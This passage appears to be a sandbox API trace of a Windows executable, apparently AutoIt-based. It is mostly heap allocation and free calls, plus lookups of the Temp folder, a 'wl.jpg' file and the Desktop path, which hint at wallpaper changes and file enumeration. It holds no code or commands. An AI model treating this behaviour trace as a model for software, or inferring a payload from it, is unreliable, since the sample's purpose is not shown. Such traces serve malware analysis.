Size=0x10) returned 0x2e53770 [0125.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0125.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e537e8 [0125.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f170 [0125.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e792e8 [0125.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e536f8 [0125.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f1a0 [0125.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53758 [0125.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0125.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f1b0 [0125.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0125.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f1b0 | out: hHeap=0x970000) returned 1 [0125.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e537e8 | out: hHeap=0x970000) returned 1 [0125.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f170 | out: hHeap=0x970000) returned 1 [0125.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0125.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0125.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.281] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53800 [0125.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53800 | out: hHeap=0x970000) returned 1 [0125.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e793b0 [0125.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0125.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0125.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f280 [0125.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e794a0 [0125.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0125.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f240 [0125.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0125.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e793d8 [0125.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53740 [0125.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0125.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f150 [0125.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0125.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0125.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0125.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2a0 [0125.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2a0 | out: hHeap=0x970000) returned 1 [0125.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0125.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f200 [0125.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f200 | out: hHeap=0x970000) returned 1 [0125.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0125.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0125.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0125.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f150 | out: hHeap=0x970000) returned 1 [0125.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0125.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f280 | out: hHeap=0x970000) returned 1 [0125.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0125.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e793b0 | out: hHeap=0x970000) returned 1 [0125.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.282] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53800 [0125.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53800 | out: hHeap=0x970000) returned 1 [0125.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79518 [0125.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0125.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53800 [0125.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f160 [0125.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79450 [0125.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e536e0 [0125.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f1b0 [0125.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e536e0 | out: hHeap=0x970000) returned 1 [0125.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e794c8 [0125.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e536c8 [0125.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0125.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0125.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f1e0 | out: hHeap=0x970000) returned 1 [0125.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2b0 | out: hHeap=0x970000) returned 1 [0125.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e536e0 | out: hHeap=0x970000) returned 1 [0125.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53710 | out: hHeap=0x970000) returned 1 [0125.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53998 | out: hHeap=0x970000) returned 1 [0125.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f1d0 | out: hHeap=0x970000) returned 1 [0125.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53800 | out: hHeap=0x970000) returned 1 [0125.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f160 | out: hHeap=0x970000) returned 1 [0125.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0125.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79518 | out: hHeap=0x970000) returned 1 [0125.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.283] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e536e0 | out: hHeap=0x970000) returned 1 [0125.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53800 | out: hHeap=0x970000) returned 1 [0125.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0125.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f1e0 | out: hHeap=0x970000) returned 1 [0125.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f160 | out: hHeap=0x970000) returned 1 [0125.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0125.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0125.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e537b8 | out: hHeap=0x970000) returned 1 [0125.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2a0 | out: hHeap=0x970000) returned 1 [0125.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e537e8 | out: hHeap=0x970000) returned 1 [0125.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f1d0 | out: hHeap=0x970000) returned 1 [0125.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0125.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0125.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.284] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.284] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0125.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0125.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.284] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e536e0 | out: hHeap=0x970000) returned 1 [0125.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53968 | out: hHeap=0x970000) returned 1 [0125.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0125.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f270 | out: hHeap=0x970000) returned 1 [0125.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f1f0 | out: hHeap=0x970000) returned 1 [0125.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e537e8 | out: hHeap=0x970000) returned 1 [0125.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e280 | out: hHeap=0x970000) returned 1 [0125.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.285] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.285] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0125.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0125.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e537b8 | out: hHeap=0x970000) returned 1 [0125.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0125.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f270 | out: hHeap=0x970000) returned 1 [0125.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.286] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/wl.jpg", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", lpFilePart=0x8cedf4*="wl.jpg") returned 0x29 [0125.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0125.286] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\wl.jpg")) returned 0xffffffff [0125.287] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x9730ae, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x8cf060, ftLastAccessTime.dwLowDateTime=0x1a97230, ftLastAccessTime.dwHighDateTime=0x1b, ftLastWriteTime.dwLowDateTime=0xfffffc02, ftLastWriteTime.dwHighDateTime=0x1d, nFileSizeHigh=0xffffffdc, nFileSizeLow=0xa7a528, dwReserved0=0x41, dwReserved1=0x9, cFileName="졲￿\x0b", cAlternateFileName="ᗶA㜨˥\x8c᭣@\x04")) returned 0xffffffff [0125.287] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0125.287] GetLastError () returned 0x6 [0125.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0125.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f1e0 | out: hHeap=0x970000) returned 1 [0125.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0125.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0125.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0125.288] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53998 [0125.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f160 [0125.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0125.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0125.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f2a0 [0125.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79518 [0125.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538a8 [0125.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f250 [0125.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53968 [0125.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0125.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53998 | out: hHeap=0x970000) returned 1 [0125.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f160 | out: hHeap=0x970000) returned 1 [0125.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0125.288] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2e0 | out: hHeap=0x970000) returned 1 [0125.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0125.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2a0 | out: hHeap=0x970000) returned 1 [0125.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0125.288] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f280 [0125.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e280 [0125.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f220 [0125.289] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0125.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e280 | out: hHeap=0x970000) returned 1 [0125.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f220 | out: hHeap=0x970000) returned 1 [0125.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0125.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e7f310 [0125.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0125.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e536e0 [0125.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f270 [0125.289] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3e0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0125.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0125.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e280 [0125.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f1e0 [0125.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f270 | out: hHeap=0x970000) returned 1 [0125.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e7f1f0 [0125.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0125.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f200 [0125.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0125.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f200 | out: hHeap=0x970000) returned 1 [0125.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e7f220 [0125.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53710 [0125.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f270 [0125.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f270 | out: hHeap=0x970000) returned 1 [0125.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53998 [0125.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79540 [0125.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0125.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f150 [0125.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0125.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0125.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0125.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0125.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f2a0 [0125.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e537b8 [0125.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e537e8 [0125.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79388 [0125.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53800 [0125.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f200 [0125.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0125.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0125.296] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f2b0 [0125.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0125.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0125.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f160 [0125.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0125.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0125.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f170 [0125.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0125.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0125.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0125.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0125.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a10 [0125.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f2e0 [0125.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e793b0 [0125.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0125.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f210 [0125.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0125.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a28 [0125.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0125.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0125.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0125.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f270 [0125.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0125.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0125.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f290 [0125.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0125.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0125.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0125.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0125.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0125.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f2f0 [0125.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0125.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0125.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ebf0 [0125.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0125.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b00 [0125.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ed40 [0125.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ed40 | out: hHeap=0x970000) returned 1 [0125.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0125.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b00 | out: hHeap=0x970000) returned 1 [0125.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0125.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0125.374] 